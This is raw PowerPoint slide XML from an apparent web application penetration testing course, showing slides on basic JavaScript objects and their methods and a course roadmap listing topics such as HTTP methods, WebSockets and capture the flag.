              <a:rPr lang="en-US" sz="1300" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>parses the string</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="800100" lvl="1" indent="-342900">
              <a:buFontTx/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Example:  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1300" b="1" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>string.length = 42</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Object type: Date</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="800100" lvl="1" indent="-342900">
              <a:buFontTx/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Method: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1300" b="1" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>getTime() </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>returns the current time</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="800100" lvl="1" indent="-342900">
              <a:buFontTx/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Method: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1300" b="1" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>getMonth() </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>returns the current month</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="800100" lvl="1" indent="-342900">
              <a:buFontTx/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Example:  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1300" b="1" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>date.getMonth() = April</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Object type: Math</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="800100" lvl="1" indent="-342900">
              <a:buFontTx/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Method: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1300" b="1" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>random() </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>returns a random number between 0 and 1</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="800100" lvl="1" indent="-342900">
              <a:buFontTx/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Method: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1300" b="1" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>sqrt() </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>returns square root of a number</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="800100" lvl="1" indent="-342900">
              <a:buFontTx/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Example:  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Math.sqrt(9) = 3;</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1300" b="1" dirty="0">
              <a:latin typeface="Courier New" charset="0"/>
              <a:ea typeface="MS PGothic" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Object type: Window</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="800100" lvl="1" indent="-342900">
              <a:buFontTx/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Method: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1300" b="1" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>open() </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>creates a new browser window</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="800100" lvl="1" indent="-342900">
              <a:buFontTx/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Method: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1300" b="1" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>alert() </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>pops up a dialog box</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="800100" lvl="1" indent="-342900">
              <a:buFontTx/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Example:  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>window.alert( "Hello World" );</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="160772" name="Content Placeholder 2"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4572000" y="1584960"/>
            <a:ext cx="4572000" cy="457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3600">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
                <a:cs typeface="MS PGothic" charset="0"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr marL="800100" indent="-34290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buFontTx/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0"/>
              <a:t>Object type: Document</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFontTx/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0">
                <a:cs typeface="Tahoma" charset="0"/>
              </a:rPr>
              <a:t>Method: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1300" b="1" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:cs typeface="Courier New" charset="0"/>
              </a:rPr>
              <a:t>write() </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0"/>
              <a:t>writes content to the page</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFontTx/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0">
                <a:cs typeface="Tahoma" charset="0"/>
              </a:rPr>
              <a:t>Method: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1300" b="1" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:cs typeface="Courier New" charset="0"/>
              </a:rPr>
              <a:t>referrer() </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0"/>
              <a:t>returns the referring URL</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFontTx/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0"/>
              <a:t>Example:  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1300" b="1" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:cs typeface="Courier New" charset="0"/>
              </a:rPr>
              <a:t>document.write("Hello");</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFontTx/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0"/>
              <a:t>Object type: Location</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFontTx/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0">
                <a:cs typeface="Tahoma" charset="0"/>
              </a:rPr>
              <a:t>Method: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1300" b="1" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:cs typeface="Courier New" charset="0"/>
              </a:rPr>
              <a:t>reload() </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0"/>
              <a:t>reloads the document</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFontTx/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0">
                <a:cs typeface="Tahoma" charset="0"/>
              </a:rPr>
              <a:t>Property: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1300" b="1" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:cs typeface="Courier New" charset="0"/>
              </a:rPr>
              <a:t>port </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0"/>
              <a:t>returns the port of the current page</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFontTx/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0"/>
              <a:t>Example:  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1300" b="1" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:cs typeface="Courier New" charset="0"/>
              </a:rPr>
              <a:t>location.port = 80;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFontTx/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0"/>
              <a:t>Object type: History</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFontTx/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0">
                <a:cs typeface="Tahoma" charset="0"/>
              </a:rPr>
              <a:t>Method: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1300" b="1" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:cs typeface="Courier New" charset="0"/>
              </a:rPr>
              <a:t>back() </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0"/>
              <a:t>is the same as the back button</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFontTx/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0">
                <a:cs typeface="Tahoma" charset="0"/>
              </a:rPr>
              <a:t>Property: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1300" b="1" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:cs typeface="Courier New" charset="0"/>
              </a:rPr>
              <a:t>length </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0"/>
              <a:t>returns history item count</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFontTx/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0"/>
              <a:t>Example:  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1300" b="1" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:cs typeface="Courier New" charset="0"/>
              </a:rPr>
              <a:t>history.back();</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFontTx/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0"/>
              <a:t>Object type: Array</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFontTx/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0">
                <a:cs typeface="Tahoma" charset="0"/>
              </a:rPr>
              <a:t>Method: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1300" b="1" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:cs typeface="Courier New" charset="0"/>
              </a:rPr>
              <a:t>join() </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0"/>
              <a:t>joins the elements in the array</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFontTx/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0">
                <a:cs typeface="Tahoma" charset="0"/>
              </a:rPr>
              <a:t>Method: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1300" b="1" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:cs typeface="Courier New" charset="0"/>
              </a:rPr>
              <a:t>sort() </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0"/>
              <a:t>sorts the array</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFontTx/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0"/>
              <a:t>Example:  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1300" b="1" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:cs typeface="Courier New" charset="0"/>
              </a:rPr>
              <a:t>array.sort();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41"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="219075" y="152400"/>
            <a:ext cx="8734425" cy="1175273"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Course Roadmap</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Rectangle 1042"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="304800" y="1981200"/>
            <a:ext cx="8458200" cy="41148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Attacker</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="3200" b="1" i="1" u="sng" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
                <a:ea typeface="MS PGothic" pitchFamily="34" charset="-128"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>'s View, Pen-</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="ja-JP" sz="3200" b="1" i="1" u="sng" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
                <a:ea typeface="MS PGothic" pitchFamily="34" charset="-128"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="3200" b="1" i="1" u="sng" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
                <a:ea typeface="MS PGothic" pitchFamily="34" charset="-128"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Testing, &amp; Scoping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 Cont.</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Capture the Flag</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900" eaLnBrk="0" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFontTx/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="3200" dirty="0">
              <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
              <a:ea typeface="MS PGothic" pitchFamily="34" charset="-128"/>
              <a:cs typeface="+mn-cs"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="Freeform 1044"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="blackWhite">
          <a:xfrm>
            <a:off x="5194300" y="152400"/>
            <a:ext cx="520700" cy="6248400"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 0 w 328"/>
              <a:gd name="T1" fmla="*/ 2147483647 h 3984"/>
              <a:gd name="T2" fmla="*/ 2147483647 w 328"/>
              <a:gd name="T3" fmla="*/ 0 h 3984"/>
              <a:gd name="T4" fmla="*/ 2147483647 w 328"/>
              <a:gd name="T5" fmla="*/ 2147483647 h 3984"/>
              <a:gd name="T6" fmla="*/ 0 w 328"/>
              <a:gd name="T7" fmla="*/ 2147483647 h 3984"/>
              <a:gd name="T8" fmla="*/ 0 60000 65536"/>
              <a:gd name="T9" fmla="*/ 0 60000 65536"/>
              <a:gd name="T10" fmla="*/ 0 60000 65536"/>
              <a:gd name="T11" fmla="*/ 0 60000 65536"/>
              <a:gd name="T12" fmla="*/ 0 w 328"/>
              <a:gd name="T13" fmla="*/ 0 h 3984"/>
              <a:gd name="T14" fmla="*/ 328 w 328"/>
              <a:gd name="T15" fmla="*/ 3984 h 3984"/>
            </a:gdLst>
            <a:ahLst/>
            <a:cxnLst>
              <a:cxn ang="T8">
                <a:pos x="T0" y="T1"/>
              </a:cxn>
              <a:cxn ang="T9">
                <a:pos x="T2" y="T3"/>
              </a:cxn>
              <a:cxn ang="T10">
                <a:pos x="T4" y="T5"/>
              </a:cxn>
              <a:cxn ang="T11">
                <a:pos x="T6" y="T7"/>
              </a:cxn>
            </a:cxnLst>
            <a:rect l="T12" t="T13" r="T14" b="T15"/>
            <a:pathLst>
              <a:path w="328" h="3984">
                <a:moveTo>
                  <a:pt x="0" y="1445"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="109" y="963"/>
                  <a:pt x="219" y="482"/>
                  <a:pt x="328" y="0"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="328" y="3984"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="219" y="3105"/>
                  <a:pt x="109" y="2324"/>
                  <a:pt x="0" y="1445"/>
                </a:cubicBez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
        <p:nvSpPr>
          <p:cNvPr id="11" name="Rectangle 1043"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5715000" y="152400"/>
            <a:ext cx="3276600" cy="6705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eaLnBrk="0" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFontTx/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1300" i="1" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>Why the Web?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="0" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFontTx/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t> Web App Pen Testing</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="0" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFontTx/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1300" b="1" i="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1300" b="1" i="1" u="sng" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>Web Site Server Architecture</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="0" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFontTx/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t> The HTTP Protocol</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="0" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFont typeface="Lucida Grande" charset="0"/>
              <a:buChar char="➢"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t> HTTP Methods</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="0" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFont typeface="Lucida Grande" charset="0"/>
              <a:buChar char="➢"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>HTTP Status Codes</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="0" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFont typeface="Lucida Grande" charset="0"/>
              <a:buChar char="➢"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>WebSockets</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="0" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFont typeface="Lucida Grande" charset="0"/>
              <a:buChar char="➢"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t> Exercise: Examining HTTP</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1300" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>    Requests and Responses</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="0" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFont typeface="Lucida Grande" charset="0"/>
              <a:buChar char="➢"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t> Client Authentication</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="0" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFont typeface="Lucida Grande" charset="0"/>
              <a:buChar char="➢"/>
              <a:defRPr/>
            </a:pPr>
